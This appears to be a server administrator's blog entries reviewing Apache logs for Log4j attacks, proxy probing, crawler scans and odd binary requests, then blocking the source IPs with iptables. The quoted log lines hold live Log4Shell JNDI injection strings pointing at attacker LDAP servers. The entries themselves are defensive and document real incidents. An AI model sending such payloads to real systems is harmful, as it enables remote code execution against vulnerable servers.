Audit of the IPs carrying out log4j attacks

A quick search through the logs:

170.210.45.163 - - [16/Dec/2021:06:19:46 +0100] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 302 5113 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [16/Dec/2021:06:19:46 +0100] "GET / HTTP/1.1" 302 5113 "-" "${jndi:ldap://185.224.139.151:1389/Exploit}"
139.59.70.139 - - [16/Dec/2021:12:36:32 +0100] "GET / HTTP/1.0" 301 558 "${jndi:ldap://159.223.5.30:1389/a}" "nimaps/1.1 ${jndi:ldap://159.223.5.30:1389/a}"

So I blocked the IPs:

# iptables -A INPUT -s 170.210.45.163 -j DROP
# iptables -A INPUT -s 139.59.70.139 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

What a mess.

IP Address: 170.210.45.163
Country: Argentina
Region: Ciudad Autonoma de Buenos Aires
City: Buenos Aires
ISP: Red de Interconexion Universitaria
Organization: Not Available
Latitude: -34.6132
Longitude: -58.3772

IP Address: 139.59.70.139
Country: India
Region: Karnataka
City: Bengaluru
ISP: DigitalOcean LLC
Organization: Not Available
Latitude: 12.9762
Longitude: 77.6033

"CONNECT 45.81.235.214:4444" log entries on Apache

I have some strange log entries on Apache:

45.81.235.112 - - [13/Dec/2021:02:12:50 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:02:38:18 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:07:19:54 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:07:41:24 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:08:02:29 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:08:23:59 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:08:44:56 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:09:05:58 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:09:27:36 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:09:48:41 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:10:10:16 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:10:31:19 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"

So I blocked the IP:

# iptables -A INPUT -s 45.81.235.112 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

To be continued.

IP Address: 45.81.235.112
Country: Germany
Region: Hessen
City: Frankfurt am Main
ISP: Gericke KG
Organization: Not Available
Latitude: 50.1155
Longitude: 8.6842

Scans from http://mj12bot.com/, I blocked the IPs

I could see quite a few scans:

# zgrep "MJ12bot" /var/log/apache2/access.*.gz  | sed 's/:/ /g' | awk '{print $2 " " $11}' | sort -n | uniq
95.91.75.28 /index.php?r=user/auth/login
95.91.75.28 /index.php?r=user/password-recovery
95.91.75.28 /robots.txt
95.91.75.28 /user/auth/login
144.76.137.254 /dashboard
144.76.137.254 /index.php?r=dashboard/dashboard
144.76.137.254 /robots.txt
144.76.137.254 /user/auth/login
144.76.137.254 /user/password-recovery
192.151.157.210 /
192.151.157.210 /robots.txt
192.151.157.210 /user/auth/login

So I dropped the IPs:

# iptables -A INPUT -s 144.76.137.254 -j DROP
# iptables -A INPUT -s 192.151.157.210 -j DROP
# iptables -A INPUT -s 95.91.75.28 -j DROP
# iptables -A INPUT -s 5.9.138.189 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

To be continued.

IP Address: 144.76.137.254
Country: Germany
Region: Bayern
City: Nuremberg
ISP: Hetzner Online AG
Organization: Not Available
Latitude: 49.4478
Longitude: 11.0683

IP Address: 192.151.157.210
Country: United States of America
Region: Missouri
City: Kansas City
ISP: Jacob Beneke
Organization: Not Available
Latitude: 39.1478
Longitude: -94.5689

IP Address: 95.91.75.28
Country: Germany
Region: Thuringen
City: Muhlhausen
ISP: Vodafone Deutschland GmbH
Organization: Not Available
Latitude: 51.2090
Longitude: 10.4528

Attack from IP 159.223.5.5, ISP: DigitalOcean LLC ... no surprise there.

Here are a few log entries:

159.223.5.5 - - [03/Nov/2021:13:00:43 +0100] "GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1" 403 443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
159.223.5.5 - - [03/Nov/2021:13:00:46 +0100] "\xbf\xbf\xaf\xaf~" 400 0 "-" "-"
159.223.5.5 - - [03/Nov/2021:13:00:46 +0100] "POST / HTTP/1.1" 302 256 "-" "WinHttpClient"
159.223.5.5 - - [03/Nov/2021:13:00:48 +0100] "\x17\x03\x01\x01\x04e" 400 0 "-" "-"
159.223.5.5 - - [03/Nov/2021:13:00:48 +0100] "\x17\x03\x01\x01\x04e" 400 0 "-" "-"

As always, it's DigitalOcean:

IP Address: 159.223.5.5
Country: Netherlands
Region: Noord-Holland
City: Amsterdam
ISP: DigitalOcean LLC
Organization: Not Available
Latitude: 52.3740
Longitude: 4.8897


Bye-bye:

iptables -A INPUT -s 159.223.5.5 -j DROP